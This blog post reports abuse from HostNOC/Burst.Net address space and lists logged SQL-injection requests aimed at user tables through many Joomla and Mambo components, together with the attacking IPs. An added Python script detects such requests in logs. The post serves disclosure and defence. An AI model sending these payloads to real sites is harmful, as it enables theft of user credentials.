Blog for hpHosts, and whatever else I feel like writing about ....

Friday, 9 December 2011

Dear HostNOC - your servers are attacking a friend!

I am assisting a friend at present, with an issue involving IPs constantly attacking his servers, and noted during one of his recent updates, that a lot of them were HostNOC - turns out, there's quite the list of them (ignoring the others from known criminal networks). All are RFI etc., and all are already being blocked by ZBBlock (a script written by my friend Zaphod).

The problem here is HostNOC's (aka Burst.Net) lack of ability in both detecting malicious traffic originating inside their own network, and the sheer amount of frustration in dealing with their abuse department, both via e-mail and via phone.

I'm in the midst of determining whether these are dedicated criminal servers, or compromised servers (I'm already aware of several black hat "hosts" that have space within HostNOC/Burst IP space, most, of course, being run by kids that frequent hackforums.net and the like), but in the meantime, for those of you that want the list of IPs and to see what they're doing, the following is the log data for them:

Date    IP    PTR    Attack Pattern
09/Dec/2011:07:21:07 -0600]    173.212.195.142    173-212-195-142.static.hostnoc.net    GET /index.php?option=com_simpleshop&Itemid=41&cmd=section&section=-000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F000%2C111%2C222%2C0x33633273366962%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:14:26:38 -0600]    173.212.195.142    173-212-195-142.static.hostnoc.net    GET /index.php?option=com_mambads&Itemid=45&func=view&ma_cat=99999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:09:46:07 -0600]    173.212.197.54    mail.wizzsolutions.com    GET /index.php?option=com_quiz&task=user_tst_shw&Itemid=61&tid=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:07:30:58 -0600]    173.212.209.228    173-212-209-228.static.hostnoc.net    GET /index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C1%2C2%2C3%2C4%2C5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:07:55:00 -0600]    173.212.209.228    173-212-209-228.static.hostnoc.net    GET /index.php?option=com_joomlavvz&Itemid=34&func=detail&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:15:56:02 -0600]    173.212.209.228    173-212-209-228.static.hostnoc.net    GET /index.php?option=com_musica&Itemid=172&tasko=viewo&task=view2&id=-4214%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:08:48:52 -0600]    173.212.209.244    air2.jetthost.net    GET /index.php?option=com_propiedades&task=search&id_provincia=0%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:15:32:46 -0600]    173.212.227.12    173-212-227-12.static.hostnoc.net    GET /index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=61&cat_id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C0x33633273366962%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C1%2C2%2C2%2C2%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:10:03:34 -0600]    173.212.227.38    fusionswift.com    GET /index.php?option=com_most&mode=email&secid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0000%2C0x33633273366962%2C2222%2C3333%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:11:00:37 -0600]    173.212.227.38    fusionswift.com    GET /index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:13:45:23 -0600]    173.212.227.54    173-212-227-54.static.hostnoc.net    GET /index.php?option=com_kbase&view=article&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:15:56:56 -0600]    173.212.235.34    srvs.us    GET /index.php?option=com_fantasytournament&func=teamsByRound&Itemid=79&roundID=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:12:12:43 -0600]    173.212.235.62    173-212-235-62.static.hostnoc.net    GET /index.php?option=com_sg&Itemid=16&task=order&range=3&category=3&pid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C10%2C11%2C0%2C0%2C14%2C15%2C16%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:10:58:41 -0600]    173.212.254.12    173-212-254-12.static.hostnoc.net    GET /index.php?option=com_mad4joomla&jid=-2%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:18:54:31 -0600]    173.212.254.12    173-212-254-12.static.hostnoc.net    GET /index.php?option=faq&task=viewallfaq&catid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:18:35:28 -0600]    173.212.254.44    platon.yapitasi.com    GET /index.php?option=com_directory&page=viewcat&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:14:03:06 -0600]    64.191.99.110    64-191-99-110.static.hostnoc.net    GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C0%2C0x33633273366962%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:11:21:46 -0600]    64.191.99.120    64-191-99-120.static.hostnoc.net    GET /index.php?option=com_omnirealestate&Itemid=0&func=showObject&info=contact&results=joomla&objid=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:16:48:42 -0600]    64.191.99.120    64-191-99-120.static.hostnoc.net    GET /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fall%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C0x33633273366962%2C5%2C6%2C7%2C8%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:14:43:25 -0600]    66.197.227.156    66-197-227-156.static.hostnoc.net    GET /index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C0x33633273366962%2C0x33633273366962%2C5%2C6%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:18:51:31 -0600]    66.197.227.156    66-197-227-156.static.hostnoc.net    GET /index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:09:29:10 -0600]    66.197.227.170    66-197-227-170.static.hostnoc.net    GET /index.php?option=com_gallery&Itemid=0&func=detail&id=-99999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:12:46:14 -0600]    66.197.227.185    cybersyn.tuonda.es    GET /index.php?option=com_mambads&Itemid=0&func=detail&cacat=0&casb=0&caid=100500%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:12:52:30 -0600]    66.197.227.185    cybersyn.tuonda.es    GET /index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C0x33633273366962%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:16:24:45 -0600]    66.197.227.185    cybersyn.tuonda.es    GET /index.php?option=com_rapidrecipe&category_id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:12:05:34 -0600]    96.9.173.40    96-9-173-40.static.hostnoc.net    GET /index.php?option=com_rsgallery&page=inline&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2C3%2C4%2C0x33633273366962%2C6%2C7%2C8%2C9%2C10%2C11%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:13:59:52 -0600]    96.9.173.48    96-9-173-48.static.hostnoc.net    GET /index.php?option=com_ricette&Itemid=S@BUN&func=detail&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%2C0%2C1%2C2%2C3%2C0%2C0%2C0%2C0%2C0%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C0%2C0%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:17:43:44 -0600]    96.9.173.58    96-9-173-58.static.hostnoc.net    GET /index.php?option=com_jmovies&Itemid=29&task=detail&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C0x33633273366962%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
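
Every request in the log above carries a URL-encoded `union select ... from jos_users` (or `mos_users`) with `/**/` standing in for spaces. The following is an added example, not part of the original post and not ZBBlock's code, showing one way to flag such requests in a log with the same column layout and group them by source IP; the sample lines, host names, component names and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in the same column layout as the log above
# (date, IP, PTR, request). IPs are documentation addresses, not real hosts.
SAMPLE_LOG = """\
09/Dec/2011:07:21:07 -0600]    192.0.2.10    host-10.example.net    GET /index.php?option=com_example&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0x41424344%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users-- HTTP/1.1
09/Dec/2011:07:25:40 -0600]    192.0.2.10    host-10.example.net    GET /index.php?option=com_demo&cid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fall%2F%2A%2A%2Fselect%2F%2A%2A%2F1%2C2%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users-- HTTP/1.1
09/Dec/2011:08:02:11 -0600]    198.51.100.7    mail.example.org    GET /index.php?option=com_content&view=article&id=42 HTTP/1.1
09/Dec/2011:08:10:03 -0600]    198.51.100.7    mail.example.org    GET /index.php?option=com_search&searchword=student+union+select+committee HTTP/1.1
"""

LINE_RE = re.compile(r"^(\S+ \S+)\s+(\S+)\s+(\S+)\s+(GET|POST|HEAD) (\S+) HTTP/\d\.\d$")
SQL_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b.*?\bfrom\s+(\w+_users)\b", re.I | re.S)
COMPONENT_RE = re.compile(r"[?&]option=([\w.-]+)")


def normalise(url, max_rounds=3):
    """URL-decode repeatedly (catches double encoding), then strip SQL comments."""
    for _ in range(max_rounds):
        decoded = unquote_plus(url)
        if decoded == url:
            break
        url = decoded
    return re.sub(r"\s+", " ", SQL_COMMENT_RE.sub(" ", url)).lower()


def scan(log_text):
    """Return {ip: [(timestamp, ptr, component, targeted_table), ...]} for flagged requests."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not in the expected column layout
        stamp, ip, ptr, _method, url = m.groups()
        decoded = normalise(url)
        found = UNION_SELECT_RE.search(decoded)
        if found:  # requires UNION SELECT *and* a FROM <prefix>_users target
            comp = COMPONENT_RE.search(decoded)
            hits[ip].append((stamp.rstrip("]"), ptr, comp.group(1) if comp else None, found.group(1)))
    return dict(hits)


if __name__ == "__main__":
    for ip, rows in scan(SAMPLE_LOG).items():
        print(ip, len(rows), rows)
```

Requiring the `from <prefix>_users` target alongside `union select` keeps a benign search for the words "union select" (the last sample line) from being flagged.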


The plain IP list;



This, of course, doesn't cover the rest of the malicious content across HostNOC/Burst IP space - but that's for another time.

1 comment:

redwolfe_98 said...

here is a related post:

http://stopmalvertising.com/security/with-love-from-hostnoc.html